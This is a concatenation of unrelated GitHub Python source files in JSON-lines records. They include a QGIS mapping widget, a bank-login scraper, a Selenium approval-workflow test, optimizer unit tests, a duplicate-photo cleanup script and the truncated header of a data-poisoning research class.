self.uCalibrationSize.setText(str(self.r.propsymbol.calib_size))\n self.uCalibrationValue.setText(str(self.r.propsymbol.calib_value))\n self.uBias.setText(str(self.r.propsymbol.bias))\n if self.r.propsymbol.symbol == 'circle':\n self.uSymbolShapeSquare.setChecked(False)\n self.uSymbolShapeCircle.setChecked(True)\n else:\n self.uSymbolShapeSquare.setChecked(True)\n self.uSymbolShapeCircle.setChecked(False)\n self.uSymbolFlannery.setChecked(self.r.propsymbol.flannery)\n self.uSymbolStyleFillColor.setColor(self.r.propsymbol.style.fillColor())\n self.uSymbolStyleStrokeColor.setColor(self.r.propsymbol.style.strokeColor())\n self.uSymbolStyleStrokeWidth.setDecimals(2)\n self.uSymbolStyleStrokeWidth.setMinimum(0.0)\n self.uSymbolStyleStrokeWidth.setSingleStep(0.1)\n self.uSymbolStyleStrokeWidth.setValue(self.r.propsymbol.style.strokeWidth)\n # choropleth tab\n self.uChoroplethAttr.clear()\n self.uChoroplethAttr.addItem('')\n for attr in layer_attributes(self.layer):\n self.uChoroplethAttr.addItem(attr)\n self.uChoroplethNClasses.setMinimum(3)\n self.uChoroplethNClasses.setMaximum(12)\n self.uChoroplethNClasses.setValue(len(self.r.choropleth.colors))\n self.uChoroplethSchemeType.setCurrentIndex(\n max(0, self.choroplethSchemeTypes.index(self.r.choropleth.type))\n )\n self.updateChoroplethScheme()\n self.uChoroplethLimits.setText(' '.join(map(str, self.r.choropleth.limits)))\n self.uChoroplethCriticalValue.setText(str(self.r.choropleth.critical_value))\n self.uChoroplethNoData.setText(str(self.r.choropleth.nodata_value))\n self.uChoroplethFillColor.setColor(self.r.choropleth.style.fillColor())\n self.uChoroplethStrokeColor.setColor(self.r.choropleth.style.strokeColor())\n self.uChoroplethStrokeWidth.setValue(self.r.choropleth.style.strokeWidth)\n self.updateUiElements()\n \n def applyUi(self):\n \"\"\"\n Applies the values in the UI to the renderer.\n \"\"\"\n # prop symbol tab\n self.r.propsymbol.attr = str(self.uPropSymbAttrMenu.currentText())\n if self.r.propsymbol.attr == '': self.r.propsymbol.attr = None\n self.r.propsymbol.calib_size = str(self.uCalibrationSize.text())\n self.r.propsymbol.calib_value = str(self.uCalibrationValue.text())\n self.r.propsymbol.bias = str(self.uBias.text())\n if self.uSymbolShapeSquare.isChecked():\n self.r.propsymbol.symbol = 'square'\n else:\n self.r.propsymbol.symbol = 'circle'\n self.r.propsymbol.flannery = self.uSymbolFlannery.isChecked()\n self.r.propsymbol.style.fillColor(self.uSymbolStyleFillColor.color())\n self.r.propsymbol.style.strokeColor(self.uSymbolStyleStrokeColor.color())\n self.r.propsymbol.style.strokeWidth = self.uSymbolStyleStrokeWidth.value()\n # choropleth tab\n self.r.choropleth.attr = str(self.uChoroplethAttr.currentText())\n if self.r.choropleth.attr == '': self.r.choropleth.attr = None\n self.r.choropleth.type = str(self.uChoroplethSchemeType.currentText()).lower()\n # colors are missing here\n self.r.choropleth.limits = string2list(str(self.uChoroplethLimits.text()))\n self.r.choropleth.critical_value = str(self.uChoroplethCriticalValue.text())\n self.r.choropleth.nodata_value = str(self.uChoroplethNoData.text())\n self.r.choropleth.style.fillColor(self.uChoroplethFillColor.color())\n self.r.choropleth.style.strokeColor(self.uChoroplethStrokeColor.color())\n self.r.choropleth.style.strokeWidth = self.uChoroplethStrokeWidth.value()\n \n def updateUiElements(self):\n pass\n \n def updateChoroplethScheme(self):\n schemetype = self.r.choropleth.type.lower()[0:3]\n nclasses = len(self.r.choropleth.colors)\n # remove all current color 
tables\n while self.uChoroplethScheme.count() > 0:\n self.uChoroplethScheme.removeItem(0)\n for k in ct: # loop over all available color tables\n # create the color scheme icon\n ncols = len(ct[k]['colors'])\n # Impossible to create icons on the fly for some unknown \n # reason. We generate images and load them through the \n # Qt resources file.\n #img = QImage(12*ncols, 24, QImage.Format_RGB32)\n #p = QPainter()\n #p.begin(img)\n #for i in range(ncols):\n # c = ct[k]['colors'][i]\n # p.fillRect(i*12, 0, 12, 24, QColor(c[0], c[1], c[2]))\n #p.end()\n #img.save('/home/ck/src/qgis-themamap/ThemaMap/colortables_icons/'+k+'.png')\n if ncols == nclasses and ct[k]['type'].lower()[0:3] == schemetype:\n ico = QIcon(QPixmap(':plugins/ThemaMap/'+k+'.png', 'png'))\n self.uChoroplethScheme.addItem(ico, ct[k]['name'])\n\n\n\n\n","repo_name":"christiankaiser/ThemaMap","sub_path":"themamap_widget.py","file_name":"themamap_widget.py","file_ext":"py","file_size_in_byte":7610,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"32190026202","text":"import base64\nimport errno\nimport json\nimport os\nimport re\nfrom pathlib import Path\n\nimport click\nimport mechanicalsoup\n\nfrom banking.credentials import Credentials\n\n\nclass Navigation:\n\n DB_LOGIN_URL = \"https://meine.deutsche-bank.de/trxm/db/init.do\"\n\n def navigate_page(self):\n browser = mechanicalsoup.StatefulBrowser(\n soup_config={'features': 'lxml'},\n raise_on_404=True\n )\n result = browser.open(self.DB_LOGIN_URL)\n\n if result.status_code != 200:\n click.echo(' Überprüfen Sie ihre Internetverbindung.')\n exit()\n\n browser.select_form('form[id=\"loginForm\"]')\n\n page = browser.get_current_page()\n\n branch_tag = page.find('input', attrs={'id': 'branch'})\n account_tag = page.find('input', attrs={'id': 'account'})\n sub_account_tag = page.find('input', attrs={'id': 'subAccount'})\n pin_tag = page.find('input', attrs={'id': 'pin'})\n\n creds = Credentials().get_credentials()\n\n branch = creds['branch']\n account = creds['account']\n sub_account = creds['sub_account']\n pin = click.prompt(' PIN', hide_input=True)\n\n browser[branch_tag['id']] = branch\n browser[account_tag['id']] = account\n browser[sub_account_tag['name']] = sub_account\n browser[pin_tag['id']] = pin\n\n result = browser.submit_selected()\n\n if result.status_code != 200:\n click.echo(' Anmelde Daten sind falsch!')\n exit()\n\n page = browser.get_current_page()\n\n modal_form = page.find(\n 'form', attrs={'id': 'displayNachrichtenboxForm'})\n\n if modal_form:\n browser.select_form('form[id=\"displayNachrichtenboxForm\"]')\n browser.submit_selected()\n\n page = browser.get_current_page()\n\n link = page.find_all('a', attrs={'class': 'visuallyEnhanced'})\n\n result = browser.follow_link(link[0])\n\n page = browser.get_current_page()\n return page\n","repo_name":"ndz-v/cli-banking","sub_path":"banking/navigation.py","file_name":"navigation.py","file_ext":"py","file_size_in_byte":2002,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26483850251","text":"kalimat1= input() \r\nkalimat2= input()\r\nnilai1= len(kalimat1) \r\nnilai2= len(kalimat2)\r\nstar= 0 \r\nhastag= 0\r\n\r\nif(nilai1 != nilai2):\r\n print(\"\\nPanjang kalimat berbeda, pesan palsu\")\r\nelse:\r\n print()\r\n for a in range(0, nilai1):\r\n if(kalimat1[a] == kalimat2[a]):\r\n if(kalimat1[a] == ' '):\r\n print(\" \", end='')\r\n else:\r\n print(\"*\", end='') \r\n star += 1\r\n else:\r\n 
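Editor's note: stripped of the Deutsche Bank specifics, the MechanicalSoup flow in the navigation.py record above is a standard select-fill-submit pattern. A generic sketch — the URL and field names are placeholders; note that browser[...] keys are the inputs' name attributes:

import mechanicalsoup

browser = mechanicalsoup.StatefulBrowser(soup_config={'features': 'lxml'})
resp = browser.open('https://example.com/login')  # placeholder URL
resp.raise_for_status()                           # open() returns a requests.Response

browser.select_form('form[id="loginForm"]')       # pick the form via CSS selector
browser['username'] = 'alice'                     # keys match <input name="...">
browser['password'] = 'secret'
result = browser.submit_selected()                # POSTs the form, follows response
page = browser.get_current_page()                 # BeautifulSoup of the new page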
print(\"#\", end='') \r\n hastag += 1\r\n \r\n print(\"\\n* =\", star)\r\n print(\"# =\", hastag)\r\n if star >= hastag :\r\n print(\"Pesan Asli\")\r\n else :\r\n print(\"Pesan Palsu\")","repo_name":"aditokta/Praktikum-Pemrograman1","sub_path":"Modul7/Soal4/PRAK604-2210817110008-Aditya Oktaviari.py","file_name":"PRAK604-2210817110008-Aditya Oktaviari.py","file_ext":"py","file_size_in_byte":661,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11649605841","text":"# map\n\nlist_x = [1,2,3,4,5,6,7,8]\n\nlist_y = [1,2,3,4,5,6]\n\nr1 = map(lambda x: x*x,list_x)\nr2 = map(lambda x,y:x*x+y,list_x,list_y)\n\nprint(list(r1))\nprint(list(r2))","repo_name":"jackmeng/qiyue-python-notes","sub_path":"python入门与进阶/code/12/c3.py","file_name":"c3.py","file_ext":"py","file_size_in_byte":163,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"15867778660","text":"'''\n测试用例标题:收款账号变更测试\n测试场景:收款账号变更流程测试\n创建者:Tom\n修改者:Tim\n创建日期:2018-7-25\n最后修改日期:2018-11-15\n输入数据:供应商:搭瓦家具公司,审批流程各个角色账号\n输出数据:无\n\n'''\n\n# -*- coding: utf-8 -*-\nimport sys, os\n\ncurPath = os.path.abspath(os.path.dirname(__file__))\nrootPath = os.path.split(curPath)[0]\n# sys.path.append(rootPath)\n\nimport unittest\nfrom cgitb import text\nimport selenium.webdriver.support.ui as ui\nfrom selenium import webdriver\nfrom time import sleep\nfrom selenium.webdriver.remote.webelement import WebElement\nfrom selenium.webdriver.common.action_chains import ActionChains\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.support.ui import Select\nfrom selenium.common.exceptions import NoSuchElementException\nfrom selenium.common.exceptions import NoAlertPresentException\nimport unittest, time, re\nimport time, unittest, configparser\nfrom selenium import webdriver\nfrom selenium.common.exceptions import NoAlertPresentException\nfrom selenium.common.exceptions import NoSuchElementException\n\nimport random\n\nimport json\n\n'''\n加载配置选项\n'''\ncfg = configparser.ConfigParser()\ncfg.read(rootPath + '/core/config.ini')\n\n'''\n测试用例\n'''\n\n\nclass Refund(unittest.TestCase):\n base_url = cfg.get(\"projects\", \"base_url\")\n project_path = cfg.get(\"projects\", \"project_path\")\n log_path = cfg.get(\"webdriver\", \"log\") + '/' + cfg.get(\"webdriver\", \"logfile\") + '-%s.log' % time.strftime(\n \"%Y-%m-%d %H_%M_%S\")\n\n def loadvendername(self):\n\n global result\n file = open(rootPath + '/data/workflow_FinancialClass_bankaccount_FlowBankAccount.json', encoding='utf-8')\n data = json.load(file)\n result = [(d['username'], d['password']) for d in data['login']]\n\n return result\n\n def loadvendernames(self):\n\n global results\n file = open(rootPath + '/data/workflow_FinancialClass_bankaccount_FlowBankAccount.json', encoding='utf-8')\n data = json.load(file)\n results = [(d['name']) for d in data['use_vendorname']]\n\n return results\n\n def setUp(self):\n # 脚本标识-标题\n self.script_name = '收款账号变更'\n # 脚本标识-ID\n self.script_id = 'workflow_FinancialClass_bankaccount_FlowBankAccount'\n self.target_url = self.base_url + self.project_path\n if (cfg.get(\"webdriver\", \"enabled\") == \"off\"):\n # 如果使用最新firefox需要屏蔽下面这句\n self.driver = webdriver.Firefox()\n else:\n # 如果使用最新firefox需要使用下面这句\n self.driver = webdriver.Firefox(log_path=self.log_path)\n\n self.driver.implicitly_wait(15)\n self.driver.maximize_window()\n self.verificationErrors = []\n 
self.accept_next_alert = True\n\n # 定义登录方法\n def login(self, username, password):\n self.driver.get(self.target_url) # 登录页面\n self.driver.find_element_by_id('account-inputEl').send_keys(username)\n self.driver.find_element_by_id('password-inputEl').send_keys(password)\n self.driver.find_element_by_xpath(\"//*[@id='LoginWin']//span[contains(@class,'x-btn-icon-el')]\").click()\n\n def test_flow_balance_refund(self):\n\n su = self.loadvendername()\n ad = self.loadvendernames()\n for i in range(0, len(su)):\n print(su[i][0])\n print(su[i][1])\n self.login(su[0][0], su[0][1])\n # self.login('Vic_cn','123')\n sleep(5)\n\n try:\n self.driver.find_element_by_xpath(\"//*[@id='msgwin-div']//div[contains(@class,'x-tool-close')]\").is_displayed()\n a = True\n except:\n a = False\n if a == True:\n print(\"元素存在\")\n elif a == False:\n print(\"元素不存在\")\n\n print(a)\n\n if a == True:\n\n # 关闭弹出框\n self.driver.find_element_by_xpath(\"//*[@id='msgwin-div']//div[contains(@class,'x-tool-close')]\").click()\n\n else:\n pass\n\n sleep(2)\n\n # 定位到申请单据\n self.driver.find_element_by_xpath(\"//*[@id='appNavTabPanel']//span[contains(@class,'fa-code-fork')]\").click()\n\n sleep(2)\n\n # 定位到财务类\n self.driver.find_element_by_xpath(\"//*[@id='west-panel-targetEl']//span[contains(text(), '财务类')]\").click()\n\n sleep(3)\n\n # 定位到收款账号变更\n self.driver.find_element_by_xpath(\"//*[@id='west-panel-targetEl']//span[contains(text(), '收款账号变更')]\").click()\n\n sleep(2)\n\n # 定位到收款账号变更新建\n self.driver.find_element_by_xpath(\"//*[@id='FlowBankAccountView']//span[contains(@class,'fa-plus')]\").click()\n\n sleep(2)\n\n # 选择供应商\n self.driver.find_element_by_xpath(\n \"//*[@id='FlowBankAccountViewFormPanelID-vendorContainer']//input[@name='main.vendorName']\").click()\n\n sleep(2)\n\n if ad[0] != '':\n\n # 定位到关键字\n self.driver.find_element_by_xpath(\n \"//*[@id='VendorDialogWinSearchPanelID-innerCt']//input[@name='keywords']\").send_keys(ad[0])\n\n sleep(2)\n\n # 点击搜索\n self.driver.find_element_by_xpath(\n \"//*[@id='VendorDialogWinSearchPanelID-innerCt']//span[contains(@class,'fa-search')]\").click()\n\n sleep(2)\n\n _elementFiveth = (random.randint(1, 10))\n\n # 定位供应商\n _elementFirst = self.driver.find_element_by_xpath(\n \"//*[@id='VendorDialogWinGridPanelID-body']//div[contains(text(),'{}')]\".format(_elementFiveth))\n\n print(_elementFirst)\n\n sleep(2)\n\n # 在此元素上双击\n ActionChains(self.driver).double_click(_elementFirst).perform()\n\n else:\n\n _elementFiveth = (random.randint(1, 10))\n\n # 定位供应商\n _elementFirst = self.driver.find_element_by_xpath(\n \"//*[@id='VendorDialogWinGridPanelID-body']//div[contains(text(),'{}')]\".format(_elementFiveth))\n\n print(_elementFirst)\n\n sleep(2)\n\n # 在此元素上双击\n ActionChains(self.driver).double_click(_elementFirst).perform()\n\n sleep(2)\n\n # 公司中文名\n self.driver.find_element_by_xpath(\n \"//*[@id='FlowBankAccountViewFormPanelID-body']//input[@name='main.companyCnName']\").send_keys('中国')\n\n sleep(2)\n\n # 公司英文名\n self.driver.find_element_by_xpath(\n \"//*[@id='FlowBankAccountViewFormPanelID-body']//input[@name='main.companyEnName']\").send_keys('CHINA')\n\n sleep(2)\n\n # 公司中文地址\n self.driver.find_element_by_xpath(\n \"//*[@id='FlowBankAccountViewFormPanelID-body']//input[@name='main.companyCnAddress']\").send_keys('广州')\n\n sleep(2)\n\n # 公司英文地址\n self.driver.find_element_by_xpath(\n \"//*[@id='FlowBankAccountViewFormPanelID-body']//input[@name='main.companyEnAddress']\").send_keys('GZ')\n\n sleep(2)\n\n # 开户银行\n self.driver.find_element_by_xpath(\n 
\"//*[@id='FlowBankAccountViewFormPanelID-body']//input[@name='main.beneficiaryBank']\").send_keys('工商银行')\n\n sleep(2)\n\n # 开户银行地址\n self.driver.find_element_by_xpath(\n \"//*[@id='FlowBankAccountViewFormPanelID-body']//input[@name='main.beneficiaryBankAddress']\").send_keys(\n '广州')\n\n sleep(2)\n\n # 账号\n self.driver.find_element_by_xpath(\n \"//*[@id='FlowBankAccountViewFormPanelID-body']//input[@name='main.bankAccount']\").send_keys(\n '6225211001112588')\n\n sleep(2)\n\n # 结算币种\n self.driver.find_element_by_xpath(\n \"//*[@id='FlowBankAccountViewFormPanelID-body']//input[@name='main.currency']\").click()\n\n sleep(2)\n\n # 选择USD\n self.driver.find_element_by_xpath(\"//*[@class='x-list-plain']//li[contains(text(), 'USD')]\").click()\n\n sleep(2)\n\n # 保函\n self.driver.find_element_by_xpath(\n \"//*[@id='FlowBankAccountViewFormPanelID-body']//input[@name='guaranteeLetterName']\").click()\n\n sleep(2)\n\n # 定位第一条记录\n _elementSecond = self.driver.find_element_by_xpath(\n \"//*[@id='FilesDialogWinGridPanelID-body']//div[contains(text(), '1')]\")\n\n sleep(2)\n\n # 在此元素上双击\n ActionChains(self.driver).double_click(_elementSecond).perform()\n\n sleep(2)\n\n # 定位到保存\n self.driver.find_element_by_xpath(\"//*[@id='FlowBankAccountForm']//span[contains(@class,'fa-save')]\").click()\n\n self.driver.implicitly_wait(60)\n\n sleep(1)\n\n # 定位关键字位置\n ul = self.driver.find_element_by_xpath(\"//*[@id='FlowBankAccountViewGridPanelID-body']/div/table/tbody/tr[1]\")\n\n lis = ul.find_elements_by_xpath('td')\n\n for i in range(0, len(lis)):\n\n if su[0][0] in lis[i].text:\n print(i + 1)\n\n column = i + 1\n\n break\n\n self.driver.find_element_by_xpath(\n \"//*[@id='FlowBankAccountViewGridPanelID-body']//div[contains(text(), '1')]\").click()\n\n sleep(2)\n\n # 定位到发启按钮\n self.driver.find_element_by_xpath(\"//*[@id='FlowBankAccountForm']//span[contains(@class,'fa-play')]\").click()\n\n self.driver.implicitly_wait(60)\n # 获取弹窗提示:\n a = self.driver.find_element_by_css_selector('.x-box-mc').get_attribute('textContent')\n print(a)\n\n # 判断流程\n _prompt = '操作提示流程已启动'\n\n if _prompt in a:\n\n pass\n\n else:\n\n print(\"流程错误\")\n\n self.driver.quit()\n\n _handler = self.driver.find_element_by_xpath(\n \"//*[@id='FlowBankAccountViewGridPanelID-body']/div/table/tbody/tr[1]/td[{0}]/div\".format(\n column)).get_attribute('textContent')\n\n print(_handler)\n\n for i in range(1, len(su)):\n\n if su[i][0] == _handler:\n _value = su[i][0]\n\n break\n\n self.driver.find_element_by_link_text('注销').click() # 点击注销\n\n self.driver.find_element_by_link_text('是').click()\n\n alert = self.driver.switch_to_alert()\n\n alert.accept() # 退出页面\n\n sleep(5)\n\n '''第一节点'''\n\n if _value == su[1][0]:\n\n self.login(su[1][0], su[1][1])\n # self.login('Vic_cn', '123')\n\n sleep(5)\n\n try:\n self.driver.find_element_by_xpath(\"//*[@id='msgwin-div']//div[contains(@class,'x-tool-close')]\").is_displayed()\n a = True\n except:\n a = False\n if a == True:\n print(\"元素存在\")\n elif a == False:\n print(\"元素不存在\")\n\n print(a)\n\n if a == True:\n\n # 关闭弹出框\n self.driver.find_element_by_xpath(\"//*[@id='msgwin-div']//div[contains(@class,'x-tool-close')]\").click()\n\n else:\n pass\n\n sleep(2)\n\n # 定位到工作面板\n self.driver.find_element_by_xpath(\"//*[@id='appNavTabPanel']//span[contains(@class,'fa-desktop')]\").click()\n\n sleep(2)\n\n # 定位到待办事项\n self.driver.find_element_by_xpath(\"//*[@id='west-panel-targetEl']//span[contains(text(), '待办事项')]\").click()\n\n sleep(2)\n\n # 定位到待办事项第一条记录\n 
self.driver.find_element_by_xpath(\"//*[@id='EventsGridPanelID-body']//div[contains(text(), '1')]\").click()\n\n sleep(2)\n\n # 点击马上处理\n self.driver.find_element_by_xpath(\n \"//*[@id='EventsFormPanelID-body']//span[contains(@class, 'x-btn-icon-el')]\").click()\n\n sleep(2)\n\n # 点击通过\n self.driver.find_element_by_xpath(\n \"//*[@id='FlowBankAccountForm']//span[contains(@class, 'fa-check-square')]\").click()\n\n self.driver.implicitly_wait(60)\n # 获取弹窗提示:\n a = self.driver.find_element_by_css_selector('.x-box-mc').get_attribute('textContent')\n print(a)\n\n _prompt = '操作提示操作成功!'\n\n if _prompt in a:\n\n pass\n\n else:\n\n print(\"流程错误\")\n\n self.driver.quit()\n\n self.driver.find_element_by_link_text('注销').click() # 点击注销\n\n self.driver.find_element_by_link_text('是').click()\n\n alert = self.driver.switch_to_alert()\n\n alert.accept() # 退出页面\n\n sleep(5)\n\n '''第二节点'''\n self.login(su[2][0], su[2][1])\n # self.login('emma', '123')\n\n sleep(5)\n\n try:\n self.driver.find_element_by_xpath(\"//*[@id='msgwin-div']//div[contains(@class,'x-tool-close')]\").is_displayed()\n a = True\n except:\n a = False\n if a == True:\n print(\"元素存在\")\n elif a == False:\n print(\"元素不存在\")\n\n print(a)\n\n if a == True:\n\n # 关闭弹出框\n self.driver.find_element_by_xpath(\"//*[@id='msgwin-div']//div[contains(@class,'x-tool-close')]\").click()\n\n else:\n pass\n\n sleep(2)\n\n # 定位到工作面板\n self.driver.find_element_by_xpath(\"//*[@id='appNavTabPanel']//span[contains(@class,'fa-desktop')]\").click()\n\n sleep(2)\n\n # 定位到待办事项\n self.driver.find_element_by_xpath(\"//*[@id='west-panel-targetEl']//span[contains(text(), '待办事项')]\").click()\n\n sleep(2)\n\n # 定位到待办事项第一条记录\n self.driver.find_element_by_xpath(\"//*[@id='EventsGridPanelID-body']//div[contains(text(), '1')]\").click()\n\n sleep(2)\n\n # 点击马上处理\n self.driver.find_element_by_xpath(\n \"//*[@id='EventsFormPanelID-body']//span[contains(@class, 'x-btn-icon-el')]\").click()\n\n sleep(2)\n\n # 点击通过\n self.driver.find_element_by_xpath(\n \"//*[@id='FlowBankAccountForm']//span[contains(@class, 'fa-check-square')]\").click()\n\n self.driver.implicitly_wait(60)\n # 获取弹窗提示:\n a = self.driver.find_element_by_css_selector('.x-box-mc').get_attribute('textContent')\n print(a)\n\n _prompt = '操作提示操作成功!'\n\n if _prompt in a:\n\n pass\n\n else:\n\n print(\"流程错误\")\n\n self.driver.quit()\n\n self.driver.find_element_by_link_text('注销').click() # 点击注销\n\n self.driver.find_element_by_link_text('是').click()\n\n alert = self.driver.switch_to_alert()\n\n alert.accept() # 退出页面\n\n sleep(5)\n\n\n\n def tearDown(self):\n self.driver.quit()\n self.assertEqual([], self.verificationErrors)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"tian848-tim/trunk","sub_path":"case/workflow_FinancialClass_bankaccount_FlowBankAccount/workflow_FinancialClass_bankaccount_FlowBankAccount.py","file_name":"workflow_FinancialClass_bankaccount_FlowBankAccount.py","file_ext":"py","file_size_in_byte":15377,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2187813294","text":"from allennlp.common.testing import AllenNlpTestCase\nimport torch\n\nfrom kglm.training.nt_asgd import NTASGDOptimizer, NTASGDScheduler\n\n\nclass NTASGDOptimizerTest(AllenNlpTestCase):\n def setUp(self):\n self.dim = 10\n self.model = torch.nn.Linear(10, 10)\n self.optim = NTASGDOptimizer(self.model.parameters(),\n lr=30.0,\n weight_decay=1.2e-6)\n super().setUp()\n\n def test_trigger(self):\n # Active optimizer should be SGD before triggering\n assert 
# Active optimizer should be SGD before triggering\n        assert self.optim.active_optimizer == self.optim._sgd\n        assert not self.optim.triggered\n        # Active optimizer should be ASGD after triggering\n        self.optim.trigger()\n        assert self.optim.active_optimizer == self.optim._asgd\n        assert self.optim.triggered\n\n    def test_awd_lstm_magic_trick(self):\n        # Here we verify we can replicate the confusing trick done in:\n        #   github.com/salesforce/awd-lstm-lm/main.py 244-260\n\n        # We need to be in asgd mode.\n        self.optim.trigger()\n\n        # Perform a couple iterations of \"training\".\n        for _ in range(3):\n            self.optim.zero_grad()\n            x = torch.randn(1, 10)\n            y_hat = self.model(x)\n            y_true = torch.randn(1, 10)\n            loss = (y_hat - y_true).pow(2).mean()\n            loss.backward()\n            self.optim.step()\n\n        # Now for the trick: assign the model parameters to the asgd average during evaluation.\n        tmp = {}\n        for prm in self.model.parameters():\n            tmp[prm] = prm.data.clone()\n            prm.data = self.optim.active_optimizer.state[prm]['ax'].clone()\n\n        # HERE IS WHERE WE WOULD EVALUATE\n\n        # Once we're done evaluating we reset the params for training\n        for prm in self.model.parameters():\n            prm.data = tmp[prm].clone()\n\n\nclass NTASGDSchedulerTest(AllenNlpTestCase):\n    def setUp(self):\n        self.dim = 10\n        self.model = torch.nn.Linear(10, 10)\n        self.optim = NTASGDOptimizer(self.model.parameters(),\n                                     lr=30.0,\n                                     weight_decay=1.2e-6)\n        self.scheduler = NTASGDScheduler(optimizer=self.optim,\n                                         non_monotone_interval=3)\n        super().setUp()\n\n    def test_scheduler_does_not_trigger_early(self):\n        assert not self.optim.triggered\n        self.scheduler.step(0.0, 0)\n        self.scheduler.step(0.1, 1)\n        self.scheduler.step(0.2, 2)\n        assert not self.optim.triggered\n\n    def test_scheduler_does_not_trigger_if_always_improving(self):\n        assert not self.optim.triggered\n        self.scheduler.step(10, 0)\n        self.scheduler.step(9, 1)\n        self.scheduler.step(8, 2)\n        self.scheduler.step(7, 3)\n        self.scheduler.step(6, 4)\n        self.scheduler.step(5, 5)\n        self.scheduler.step(4, 6)\n        assert not self.optim.triggered\n\n    def test_scheduler_does_trigger_when_expected(self):\n        assert not self.optim.triggered\n        self.scheduler.step(10, 0)\n        self.scheduler.step(9, 1)\n        self.scheduler.step(8, 2)\n        self.scheduler.step(7, 3)\n        self.scheduler.step(11, 4)\n        assert self.optim.triggered\n","repo_name":"rloganiv/kglm-model","sub_path":"kglm/tests/training/nt_asgd_test.py","file_name":"nt_asgd_test.py","file_ext":"py","file_size_in_byte":3273,"program_lang":"python","lang":"en","doc_type":"code","stars":111,"dataset":"github-code","pt":"53"} +{"seq_id":"26966398589","text":"'''\nThe downloaded photos may already be backed up elsewhere (e.g. a NAS or WebDAV share).\nThis script walks all photos and deletes any duplicates,\nso the remainder can be backed up manually afterwards.\n'''\n\nimport os\nimport filecmp\n\nlibrary_path = \"P:/wxy\"  # folder to check against (the reference library)\nreduct_path = \"G:/设备备份/谷歌TakeOut/相册1\"  # folder to de-duplicate\n\ntotal_count = 0\n\nall_files = []  # file names only, for fast matching\nall_paths = []  # full paths, to confirm duplicate files\n\n'''\nCollect all existing photos from the backup photo library.\nThis can be a network folder such as WebDAV; it should not be too slow.\n'''\ndef loopAllFiles(base_dir):\n    # walk every folder\n    file_list = os.listdir(base_dir)\n    for file in file_list:\n        cur_path = os.path.join(base_dir, file)\n        if os.path.isdir(cur_path):\n            # recurse into subfolders\n            loopAllFiles(cur_path)\n        else:\n            if file.endswith(\".json\"):\n                continue\n            else:\n                all_files.append(file)\n                all_paths.append(cur_path)\n\n\n
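# (editor sketch, hypothetical helper): duplicates below are matched by file name\n# only; a stricter check could compare bytes with filecmp, which is already\n# imported above. Not wired into the flow — shown only as an illustration.\ndef is_same_content(path_a, path_b):\n    # shallow=False forces a byte-by-byte comparison instead of comparing os.stat() data\n    return filecmp.cmp(path_a, path_b, shallow=False)\n\n\n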
'''\nCompare photos one by one and delete any duplicate.\n'''\ndef detectSameFile(path):\n    file_name = os.path.basename(path)\n    if file_name in all_files:\n        # duplicate file\n        index = all_files.index(file_name)\n        full_path = all_paths[index]\n        # if filecmp.cmp(path, full_path, shallow=True):\n        print(total_count, \"duplicate file:\", path, \" -> \", all_paths[index])\n        os.remove(path)\n\n'''\nWalk the target folder and collect all target files.\n'''\ndef loopTargetFiles(base_dir):\n    global total_count\n    # walk every folder\n    file_list = os.listdir(base_dir)\n    for file in file_list:\n        cur_path = os.path.join(base_dir, file)\n        if os.path.isdir(cur_path):\n            # recurse into subfolders\n            loopTargetFiles(cur_path)\n        else:\n            if file.endswith(\".json\"):\n                continue\n            else:\n                detectSameFile(cur_path)\n                # print(total_count, cur_path)\n                total_count = total_count + 1\n\n\nif __name__ == \"__main__\":\n    loopAllFiles(library_path)\n    print('number of files to match:', len(all_files))\n    loopTargetFiles(reduct_path)\n\n","repo_name":"iwxyi/GooglePhotoProcess","sub_path":"remove_same.py","file_name":"remove_same.py","file_ext":"py","file_size_in_byte":2194,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13117121888","text":"# coding:utf-8\n\nimport torch\nimport os\nimport argparse\nimport json\nfrom setproctitle import setproctitle\n\nfrom learn.network.network import make_pvnetwork\n\ndevice = \"cuda\"\n\nparser = argparse.ArgumentParser(description=\"Initialize reinforcement learning\")\nparser.add_argument(\"--proc_name\", type=str,\n                    default=\"UTTT\", help=\"process name\")\nparser.add_argument(\"--output_path\", type=str,\n                    default=\"./RL_output\", help=\"directory used for training\")\nparser.add_argument(\"--bin_num\", type=int,\n                    default=10, help=\"number of directories the training data is split into\")\nparser.add_argument(\"--init_model\", type=str,\n                    default=None, help=\"initial state for training\") \nargs = parser.parse_args()\n\nsetproctitle(f\"{args.proc_name}_initialize\")\n\n# create the directories\nos.makedirs(args.output_path, exist_ok=False)\nos.makedirs(os.path.join(args.output_path, \"models\"), exist_ok=True)\nos.makedirs(os.path.join(args.output_path, \"logs\"), exist_ok=True)\n\nsavedata = {\"epoch\": 0}\n\n# create the initial model state\nmodel_path = os.path.join(args.output_path, \"models\")\nos.makedirs(model_path, exist_ok=True)\nmodel = make_pvnetwork()\nmodel = model.to(device)\nif args.init_model is not None:\n    model.load_state_dict(torch.load(args.init_model), strict=False)\n\ntorch.save(model.state_dict(), os.path.join(model_path, \"state_0.pth\"))\n\n# create the directories that hold the self-play data\nfor idx in range(args.bin_num):\n    bin_path = os.path.join(args.output_path, f\"data/data_{idx}\")\n    os.makedirs(bin_path)\n\nwith open(os.path.join(args.output_path, \"savedata.json\"), mode=\"w\") as f:\n    json.dump(savedata, f)\n","repo_name":"takeo1116/UTTTGame","sub_path":"learn/reinforcement/initialize.py","file_name":"initialize.py","file_ext":"py","file_size_in_byte":1718,"program_lang":"python","lang":"ja","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"38725311263","text":"\"\"\"Main class, holding information about models and training/testing routines.\"\"\"\n\nimport torch\nfrom ..consts import BENCHMARK\nfrom ..utils import cw_loss, reverse_xent_avg\nimport pdb\ntorch.backends.cudnn.benchmark = BENCHMARK\n\nfrom .forgemaster_base import _Forgemaster\n\nclass ForgemasterUntargeted(_Forgemaster):\n    